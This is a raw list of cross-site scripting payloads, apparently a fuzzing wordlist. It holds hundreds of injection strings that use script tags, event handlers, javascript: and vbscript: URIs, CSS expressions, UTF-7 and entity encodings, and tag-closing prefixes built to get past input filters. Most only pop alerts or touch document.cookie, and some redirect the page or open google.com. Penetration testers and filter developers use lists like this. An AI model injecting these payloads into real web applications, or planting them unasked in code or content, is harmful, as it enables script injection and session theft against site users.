"--><script>alert(1)</script>
--><script>alert(1)</script>
<b onmouseover=alert('TESTTEST')>click me!</b>
TESTTESTTESTTEST'><script>alert(TESTTEST)</script>
<img src=. onerror=alert("TESTTEST")>
TEST"><script>alert(document.cookie)</script>/-
TEST"><script>alert(1)</script>/-
TEST"><script>alert("TESTTEST")</script>/-
/test"><script>alert("TESTTEST")</script>/-
<noembed><![CDATA[ <]]><![CDATA[/noembed><script>alert(document.cookie)</script> ]]></noembed>
<noembed><![CDATA[ <]]><![CDATA[/noembed><script>alert(098)</script> ]]></noembed>
/test"><script>alert("TESTTEST")</script>
95888\"%3balert(1)//7de0b7380f0
<script type="application/x-javascript">alert(098);</script>
95888\\";alert(1)//7de0b7380f0
"><img src=x onerror=prompt(1);>
javascript:alert(1)
;><img%20src="javascript:alert(document.domain)"> 
;><img%20src="javascript:alert(1)"> 
<noembed><![CDATA[ <script>alert(document.cookie)</script> ]]></noembed> 
<noembed><![CDATA[ <script>alert(098)</script> ]]></noembed> 
%22]%29;}catch%28e%29{}alert%281%29;//
"; alert(1); //
"; alert("098"); //
<img/src=">" onerror=alert(1)>
<button/a=">" autofocus onfocus=alert&#40;1&#40;></button>
<button a=">" autofocus onfocus=alert&#40;1&#40;>
"; alert("test"); //
<iframe src='http://xssed.com'
<img src=x onerror=prompt(1);>
";document.location="http://google.com";//
><img src=x onerror=prompt(1);>
<noembed><![CDATA[ </noembed><script>alert(098)</script> ]]></noembed> 
<noembed><![CDATA[ </noembed><script>alert(document.cookie)</script> ]]></noembed> 
'"--></style></script><script>alert(1)</script>
"--></style></script><script>alert(1)</script>
--></style></script><script>alert(1)</script>
/test"><script>alert(1)</script>
test\")//</script><STRONG>CATCAT</strong><script>
TESTTESTTESTTEST"><script>alert%28123%29<%2fscript>
TESTTESTTESTTEST<%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060&#60;&#060;&#0060;&#00060;&#000060;&#0000060;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c&#x3c;&#x03c;&#x003c;&#x0003c;&#x00003c;&#x000003c;&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c&#X3c;&#X03c;&#X003c;&#X0003c;&#X00003c;&#X000003c;&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C&#x3C;&#x03C;&#x003C;&#x0003C;&#x00003C;&#x000003C;&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C&#X3C;&#X03C;&#X003C;&#X0003C;&#X00003C;&#X000003C;\x3c\x3C\u003c\u003C
<object><param name="src" value="javascript:alert(0)"></param></object>
<object><param name="src" value="javascript:alert(098)"></param></object>
<object data="javascript:alert(0)"
<object data="javascript:alert(098)"
>"><img src=1 onerror=alert(1)>
'"--></style></script><script>alert(0x00081E)</script>
"+onmouseover="javascript:alert(1)
<img src="x:blah" onerror="alert(1)">
<script>alert('1:=!')</script> 
" onmouseover="javascript:alert(1)
<script>alert1:=<script> 
"><body+onload="document%2Ewrite(String.fromCharCode(60,115))"+
"style="background-image:url('http://www.google.com/images/errors/logo_sm.gif')"onfocus="document.write(String.fromCharCode(60)%2B'iframe src=http://google.com height=100%25width=100%25>'%2BString.fromCharCode(60)%2B'/iframe>'%2BString.fromCharCode(60)%2B'script>alert(/XSS/)'%2BString.fromCharCode(60)%2B'/script>')"
";document.location="http://www.google.com";//
#*/alert(1)//*
"><script>alert(1)</script><a b="
%22%3E%3Cscript%3Ealert("CAT")%3C/script%3E
%22%3E%3Cscript%3Ealert(098)%3C/script%3E
//%22%3E%27%3E%3CSCRIPT%3Ealert%28%221%22%29%3C/SCRIPT%3E
//">'><SCRIPT>alert("1")</SCRIPT>
//">'><SCRIPT>alert(098)</SCRIPT>
">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>                            
">'><SCRIPT>alert(1)</SCRIPT>                            
//%22%3E%27%3E%3CSCRIPT%3Ealert%281%29%3C/SCRIPT%3E
'%uff1cscript%uff1ealert(2)%uff1c/script%uff1e'
<SCrIPT>window.open("http://www.google.com")<%2FSCrIPT>
<SCrIPT>alert(098)<%2FSCrIPT>
%uff1cscript%uff1ealert(3)%uff1c/script%uff1e
\\'); alert(4);var x=\'
1"style="background:url(javascript:alert('TESTTEST'))"%20"
1"style="background:url(javascript:alert('1))"%20"
--><script>alert('TEST')</script>
--><script>alert(1)</script>
>"><script>alert("TEST")</script>
>"><script>alert(1)</script>
>"'><img%20src="javascript:alert('TEST')">
>"'><img%20src="javascript:alert(1)">
"'/><script>alert(1)</script>
>"'><img src="javascript:alert(1)">
\";alert(5);//
"--></style></script><script>alert(0x025A22)</script>
"--></style></script><script>alert(1)</script>
alert(document.cookie)
";eval(unescape(location))//#%0Aalert(0
--></style></script><script>alert(1)</script>
"<script>alert('XSS')</script>
"<script>alert(098)</script>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
location='javascript:alert(0)';
#'"/><img/src='/xss'onerror='alert(2)'/>
<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>
</a onmousemove="alert(1)">
'"/><img/src='/xss'onerror='alert(2)'/>
#'"/><img/src='/xss'onerror='alert("TESTTEST")'/>
'"/><img/src='/xss'onerror='alert("TESTTEST")'/>
¼script¾alert(6)¼/script¾
¼script¾alert("TESTTEST")¼/script¾
<img src="<img src=search"/onerror=alert("TESTTEST")//">
<img src="<img src=search"/onerror=alert(1)//">
exp/*<A STYLE='no\ass:noass("*//*");ass:ex/*aSS*//*/*/pression(alert(7))'>
exp/*<A STYLE='no\ass:noass("*//*");ass:ex/*aSS*//*/*/pression(alert("TESTTEST"))'>
<marquee scrollamount="3" scrolldelay="10" onStart="\u0061lert(8)">TESTTESTTESTTEST
TESTTESTTESTTEST"><marquee scrollamount='3' scrolldelay='10' onStart='\u0061lert(9)'>TESTTESTTESTTEST
%uff02><marquee scrollamount=%uff023%uff02 scrolldelay=%uff0210%uff02 onStart=%uff02\u0061lert(10)%uff02>TESTTESTTESTTEST
TESTTESTTESTTEST'><marquee scrollamount="3" scrolldelay="10" onStart="\u0061lert(10)">TESTTESTTESTTEST
%uff07><marquee scrollamount=%uff073%uff07 scrolldelay=%uff0710%uff07 onStart=%uff07\u0061lert(10)%uff07>TESTTESTTESTTEST
TESTTESTTESTTEST'><marquee scrollamount=3 scrolldelay=10 onStart=\u0061lert(11)>TESTTESTTESTTEST'
TESTTESTTESTTEST'\u0061lert(12)'
TESTTESTTESTTEST"\u0061lert(13)"
TESTTESTTESTTEST');alert('14
TESTTESTTESTTEST");alert("15
"+onmouseover="javascript:alert("TESTTEST")"
"+onmouseover="javascript:alert(1)"
data:text/html,<script>alert(0)</script>
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%B
" onmouseover="javascript:alert(1)"
<img src="x:ö" title="onerror=alert(1)//"
" STYLE="xss:expression(alert('TESTTEST'))
" STYLE="xss:expression(alert(1))
<a href="javascript:alert(1)">TESTTEST</a>
",eval("alert(1)"),"
eval("alert(1)"),
eval(alert(1))
eval('alert(1)')
<a href="vbscript:MsgBox(1)">TESTTEST</a>
<a href="javascript:alert("TESTTESTTESTTEST")">TESTTEST</a>
<a href="vbscript:MsgBox("TESTTESTTESTTEST")">TESTTEST</a>
TESTTESTTESTTEST');}alert(16);function TESTTESTTESTTEST(){var bla=eval('
TESTTESTTESTTEST');}}alert(17);function TESTTESTTESTTEST(){if (1){var i=eval('
TESTTESTTESTTEST");}alert(18);function TESTTESTTESTTEST(){var bla=eval("
TESTTESTTESTTEST");}}alert(19);function TESTTESTTESTTEST(){if (1){var i=eval("
TESTTESTTESTTEST';}alert(20);function TESTTESTTESTTEST(){var i='1 
TESTTESTTESTTEST";}alert(21);function TESTTESTTESTTEST(){var i="1 
TESTTESTTESTTEST';}}alert(22);function TESTTESTTESTTEST(){if (1){var i='1 
TESTTESTTESTTEST";}}alert(23);function TESTTESTTESTTEST(){if (1){var i="1 
"><script> >alert(1)</script> >
"><script> alert(1)</script> >
"><ScRiPt>alert(1)</ScRiPt>
"%3e%3cscript%3ealert(1)%3c/script%3e
"><scr><script>iptalert(1)</scr</script>ipt>
%00"><script>alert(1)</script>
"><script>alert(1)</script><!—
'; alert(1);
javascript:alert(1);
"onerror="alert(1)
style=x:expression(alert(1))
><script>alert(098)</script><b a=a
a></a><script>alert(098)</script>
\'><script>alert%28\'098\'%29</script><
<img src="x:ö" title="onerror=alert(1)//"
<img src="x:ö" title="onerror=alert(1)//"
<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img
<b "<script>alert(1)</script>">test</b
/<script x>alert(1)</script>
"%20style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px"%20onM
ouseOver="alert(1)
style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px"%20onM
ouseOver="alert(1)
style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px"%20<script>alert(1)</script>
'"</style></script><script>alert(0x000296)</script>
</textarea></td></tr><script>alert('TESTTEST')</script>
'"</style></script><script>alert('TESTTEST')</script>
"><script>alert('TESTTEST')</script>"
"/><script>alert('TESTTEST')</script>"
">'><SCRIPT>alert(String.fromCharCode(888383))</SCRIPT
">'><SCRIPT>alert(String.fromCharCode(888383))</SCRIPT>
">'><SCRIPT>alert(1)</SCRIPT
">'><SCRIPT>alert(1)</SCRIPT>
<p onmouseover=alert(1)>
%22+onmouseover=%22javascript:alert%281%29
<p onmousemove=alert(1)>
%3Cscript%3Ealert%28/TESTTEST/%29%3C/script%3E
</style></script><script>alert(0x000296)</script>
</textarea></td></tr><script>alert('TESTTEST')</script>
</style></script><script>alert('TESTTEST')</script>
><script>alert('TESTTEST')</script>"
/><script>alert('TESTTEST')</script>"
><script>alert(1)</script>
/><script>alert(1)</script>
<script>alert(String.fromCharCode(888383))</script>
';alert(String.fromCharCode(888383))//\';alert(String.fromCharCode(888383))//";alert(String.fromCharCode(888383))//\";alert(String.fromCharCode(888383))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(888383))</SCRIPT>
<script>alert(1)</script><script>alert(1)</script>
"<script>alert(1)</script><script>alert(1)</script>
"><script>alert(1)</script><script>alert(1)</script>
'';!--"<TESTTEST>=&{()}
<IMG SRC=javascript:alert('TESTTEST')>
<IMG SRC=javascript:alert(1)>
<IMG SRC=javascript:alert(&quot;TESTTEST&quot;)>
<IMG SRC=javascript:alert(&quot;1&quot;)>
<IMG SRC=javascript:alert(String.fromCharCode(888383))>
<form id="TESTTEST" /><button form="TESTTEST" formaction="javascript:alert(1)">X
<input onfocus=write(1) autofocus>
<input onblur=write(1) autofocus><input autofocus>
<video poster=javascript:alert(1)//
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=TESTTEST onforminput=alert(1)><input></form><button form=TESTTEST onformchange=alert(2)>X
<video><source onerror="javascript:alert(1)">
<video onerror="javascript:alert(1)"><source>
<form><button formaction="javascript:alert(1)">X
<body oninput=alert(1)><input autofocus>
 "/><script>alert(1)</script
<frameset onload=alert(1)>
<table background="javascript:alert(1)">
<!--<img src="--><img src=x onerror=alert(1)//">
<comment><img src="</comment><img src=x onerror=alert(1))//">
<style><img src="</style><img src=x onerror=alert(1)//">
<li style=list-style:url() onerror=alert(1)> <div style=content:url(data:image/svg+xml%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<object data="data:text/html;base64PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<b <script>alert(1)</script>0
<x '="foo"><x foo='><img src=x onerror=alert(1)//'>
<embed src="javascript:alert(1)"> 
<img src="javascript:alert(1)"> 
<image src="javascript:alert(1)"> 
<script src="javascript:alert(1)">
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(1)></a>">
<style>@import "data:*%7bx:expression(write(1))%7D";</style>
<link rel=stylesheet href=data:*%7bx:expression(write(1))%7d
* {-o-link:'javascript:alert(1)';-o-link-source: current;}
<IMG SRC="jav&#x09;ascript:alert('TESTTEST');">
<IMG SRC="jav&#x09;ascript:alert(1);">
<IMG SRC="jav&#x0A;ascript:alert('TESTTEST');">
<IMG SRC="jav&#x0A;ascript:alert(1);">
<<SCRIPT>alert("TESTTEST");//<</SCRIPT>
<<SCRIPT>alert(1);//<</SCRIPT>
</TITLE><SCRIPT>alert("TESTTEST");</SCRIPT>
</TITLE><SCRIPT>alert(1);</SCRIPT>
<BODY BACKGROUND="javascript:alert('TESTTEST')">
<BODY BACKGROUND="javascript:alert(1)">
"</script><script>alert('TESTTESTTESTTEST');</script></script>
"</script><script>alert(TESTTEST);</script></script>
"/>><script>alert("TESTTEST")</script>
"/><script>alert("TESTTEST")</script>
'"</script><script>alert("TESTTEST")</script>
>"'><script>alert("TESTTEST")</script>
>"'><script>alert(1)</script>
<input onmousemove=write(123)//
"><\0SCRIPT>alert('TESTTEST')<\/SCRIPT>
</TESTTEST STYLE=TESTTEST:expression(alert('TESTTEST'))>
TESTTEST STYLE=TESTTEST:e/**/xpression(alert('TESTTEST'))>
TESTTEST/*-*/STYLE=TESTTEST:e/**/xpression(alert('TESTTEST'))>
</TESTTEST/*-*/STYLE=TESTTEST:e/**/xpression(alert('TESTTEST'))>
<~/TESTTEST/*-*/STYLE=TESTTEST:e/**/xpression(alert('TESTTEST'))>
<~/TESTTEST/*-*/STYLE=TESTTEST:e/**/xpression(alert('TESTTEST'))>
"onmouseover=alert(1)//
"onmouseover=alert("TEST")//
"onmouseover=alert("TEST")
"onmouseover=alert(1)
<script>document.cookie</script>'</script>

"%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"
"';alert(String.fromCharCode(888383))//';alert(String.fromCharCode(888383))//";alert(String.fromCharCode(888383))//";alert(String.fromCharCode(888383))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(888383))</SCRIPT>"
"'';!--"<XSS>=&{()}"
"<IMG SRC="javascript:alert('XSS');">"
"<IMG SRC=javascript:alert('XSS')>"
"<IMG SRC=JaVaScRiPt:alert('XSS')>"
"<IMG SRC=javascript:alert(&quot;XSS&quot;)>"
"<IMG SRC=`javascript:alert("is this 'XSS'")`>"
"<IMG """><SCRIPT>alert("XSS")</SCRIPT>">"
"<IMG SRC=javascript:alert(String.fromCharCode(888383))>"
"<IMG SRC=javascript:alert('XSS')>"
"<IMG SRC="jav ascript:alert('XSS');">"
"<IMG SRC="jav	ascript:alert('XSS');">"
"<IMG SRC="jav ascript:alert('XSS');">"
"<IMG SRC="jav
ascript:alert('XSS');">"
<IMG SRC=" javascript:alert('XSS');">"
<BODY onload!#$%&()*~+-_.:;?@[/|\]^`=alert("XSS")>"
<<SCRIPT>alert("XSS");//<</SCRIPT>"
<IMG SRC="javascript:alert('XSS')""
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>"
";alert('XSS');//"
</TITLE><SCRIPT>alert("XSS");</SCRIPT>"
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">"
<BODY BACKGROUND="javascript:alert('XSS')">"
<BODY ONLOAD=alert('XSS')>"
<IMG DYNSRC="javascript:alert('XSS')">"
<IMG LOWSRC="javascript:alert('XSS')">"
<BGSOUND SRC="javascript:alert('XSS');">"
<BR SIZE="&{alert('XSS')}">"
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">"
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS"
<IMG SRC='vbscript:msgbox("XSS")'>"
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">"
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">"
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>"
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>"
<TABLE BACKGROUND="javascript:alert('XSS')">"
<TABLE><TD BACKGROUND="javascript:alert('XSS')">"
<DIV STYLE="background-image: url(javascript:alert('XSS'))">"
<DIV STYLE="background-image: url(javascript:alert('XSS'))">"
<DIV STYLE="width: expres?sion(alert('XSS'));">"
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>"
<IMG STYLE="xss:expr/*XSS*/es?sion(alert('XSS'))">"
<XSS STYLE="xss:expres?sion(alert('XSS'))">"
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>"
<BASE HREF="javascript:alert('XSS');//">"
<? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?>"
<A HREF="http://111122222/">XSS</A>"
<A HREF="http://www.google.com./">XSS</A>"
<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
<SCRIPT>document.cookie=true;</SCRIPT>
<IMG SRC="jav ascript:document.cookie=true;">
<IMG SRC="javascript:document.cookie=true;">
<IMG SRC=" &#14; javascript:document.cookie=true;">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
<SCRIPT>document.cookie=true;//<</SCRIPT>
<SCRIPT <B>document.cookie=true;</SCRIPT>
<IMG SRC="javascript:document.cookie=true;">
<iframe src="javascript:document.cookie=true;> 
<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> 
</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
<BODY BACKGROUND="javascript:document.cookie=true;">
<BODY ONLOAD=document.cookie=true;>
<IMG DYNSRC="javascript:document.cookie=true;">
<IMG LOWSRC="javascript:document.cookie=true;">
<BGSOUND SRC="javascript:document.cookie=true;">
<BR SIZE="&{document.cookie=true}">
<LAYER SRC="javascript:document.cookie=true;"></LAYER>
<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
¼script¾document.cookie=true;¼/script¾ 
<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
<TABLE BACKGROUND="javascript:document.cookie=true;">
<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
<DIV STYLE="background-image: url(&#1;javascript:document.cookie=true;)">
<DIV STYLE="width: expression(document.cookie=true);">
<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> 
exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> 
<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> 
<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> 
<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> 
<SCRIPT>document.cookie=true;</SCRIPT>
<BASE HREF="javascript:document.cookie=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.cookie=true;">
<div onmouseover="document.cookie=true;">
<img src="javascript:document.cookie=true;">
<img dynsrc="javascript:document.cookie=true;">
<input type="image" dynsrc="javascript:document.cookie=true;">
<bgsound src="javascript:document.cookie=true;">
&<script>document.cookie=true;</script> 
&{document.cookie=true;}; 
<img src=&{document.cookie=true;};> 
<link rel="stylesheet" href="javascript:document.cookie=true;"> 
<img src="mocha:document.cookie=true;"> 
<img src="livescript:document.cookie=true;"> 
<a href="about:<script>document.cookie=true;</script>"> 
<body onload="document.cookie=true;"> 
<div style="background-image: url(javascript:document.cookie=true;);"> 
<div style="behaviour: url([link to code]);"> 
<div style="binding: url([link to code]);"> 
<div style="width: expression(document.cookie=true;);">
<style type="text/javascript">document.cookie=true;</style>
<object classid="clsid:..." codebase="javascript:document.cookie=true;">
<style><!--</style><script>document.cookie=true;//--></script>
<<script>document.cookie=true;</script>
<script>document.cookie=true;//--></script>
<!-- -- --><script>document.cookie=true;</script><!-- -- -->
<img src="blah"onmouseover="document.cookie=true;">
<img src="blah>" onmouseover="document.cookie=true;">
<xml src="javascript:document.cookie=true;">
<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>



Cross Site Scripting Strings with close TAG:

>"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
>"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
>"<SCRIPT>document.cookie=true;</SCRIPT>
>"<IMG SRC="jav ascript:document.cookie=true;">
>"<IMG SRC="javascript:document.cookie=true;">
>"<IMG SRC=" &#14; javascript:document.cookie=true;">
>"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
>"<SCRIPT>document.cookie=true;//<</SCRIPT>
>"<SCRIPT <B>document.cookie=true;</SCRIPT>
>"<IMG SRC="javascript:document.cookie=true;">
>"<iframe src="javascript:document.cookie=true;> 
>"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> 
>"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
>"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
>"<BODY BACKGROUND="javascript:document.cookie=true;">
>"<BODY ONLOAD=document.cookie=true;>
>"<IMG DYNSRC="javascript:document.cookie=true;">
>"<IMG LOWSRC="javascript:document.cookie=true;">
>"<BGSOUND SRC="javascript:document.cookie=true;">
>"<BR SIZE="&{document.cookie=true}">
>"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
>"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
>"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
>"¼script¾document.cookie=true;¼/script¾ 
>"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
>"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
>"<TABLE BACKGROUND="javascript:document.cookie=true;">
>"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
>"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
>"<DIV STYLE="background-image: url(&#1;javascript:document.cookie=true;)">
>"<DIV STYLE="width: expression(document.cookie=true);">
>"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
>"<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
>"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> 
>"exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> 
>"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> 
>"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> 
>"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> 
>"<SCRIPT>document.cookie=true;</SCRIPT>
>"<BASE HREF="javascript:document.cookie=true;//">
>"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
>"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
>"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
>"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
>"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
>"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
>"<a href="javascript#document.cookie=true;">
>"<div onmouseover="document.cookie=true;">
>"<img src="javascript:document.cookie=true;">
>"<img dynsrc="javascript:document.cookie=true;">
>"<input type="image" dynsrc="javascript:document.cookie=true;">
>"<bgsound src="javascript:document.cookie=true;">
>"&<script>document.cookie=true;</script> 
>"&{document.cookie=true;}; 
>"<img src=&{document.cookie=true;};> 
>"<link rel="stylesheet" href="javascript:document.cookie=true;"> 
>"<img src="mocha:document.cookie=true;"> 
>"<img src="livescript:document.cookie=true;"> 
>"<a href="about:<script>document.cookie=true;</script>"> 
>"<body onload="document.cookie=true;"> 
>"<div style="background-image: url(javascript:document.cookie=true;);"> 
>"<div style="behaviour: url([link to code]);"> 
>"<div style="binding: url([link to code]);"> 
>"<div style="width: expression(document.cookie=true;);">
>"<style type="text/javascript">document.cookie=true;</style>
>"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
>"<style><!--</style><script>document.cookie=true;//--></script>
>"<<script>document.cookie=true;</script>
>"<script>document.cookie=true;//--></script>
>"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
>"<img src="blah"onmouseover="document.cookie=true;">
>"<img src="blah>" onmouseover="document.cookie=true;">
>"<xml src="javascript:document.cookie=true;">
>"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
>"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
-1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
-1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<IMG SRC="jav ascript:document.cookie=true;">
-1<IMG SRC="javascript:document.cookie=true;">
-1<IMG SRC=" &#14; javascript:document.cookie=true;">
-1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
-1<SCRIPT>document.cookie=true;//<</SCRIPT>
-1<SCRIPT <B>document.cookie=true;</SCRIPT>
-1<IMG SRC="javascript:document.cookie=true;">
-1<iframe src="javascript:document.cookie=true;> 
-1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> 
-1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
-1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
-1<BODY BACKGROUND="javascript:document.cookie=true;">
-1<BODY ONLOAD=document.cookie=true;>
-1<IMG DYNSRC="javascript:document.cookie=true;">
-1<IMG LOWSRC="javascript:document.cookie=true;">
-1<BGSOUND SRC="javascript:document.cookie=true;">
-1<BR SIZE="&{document.cookie=true}">
-1<LAYER SRC="javascript:document.cookie=true;"></LAYER>
-1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
-1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
-1¼script¾document.cookie=true;¼/script¾ 
-1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
-1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
-1<TABLE BACKGROUND="javascript:document.cookie=true;">
-1<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
-1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
-1<DIV STYLE="background-image: url(&#1;javascript:document.cookie=true;)">
-1<DIV STYLE="width: expression(document.cookie=true);">
-1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
-1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
-1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> 
-1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> 
-1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> 
-1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> 
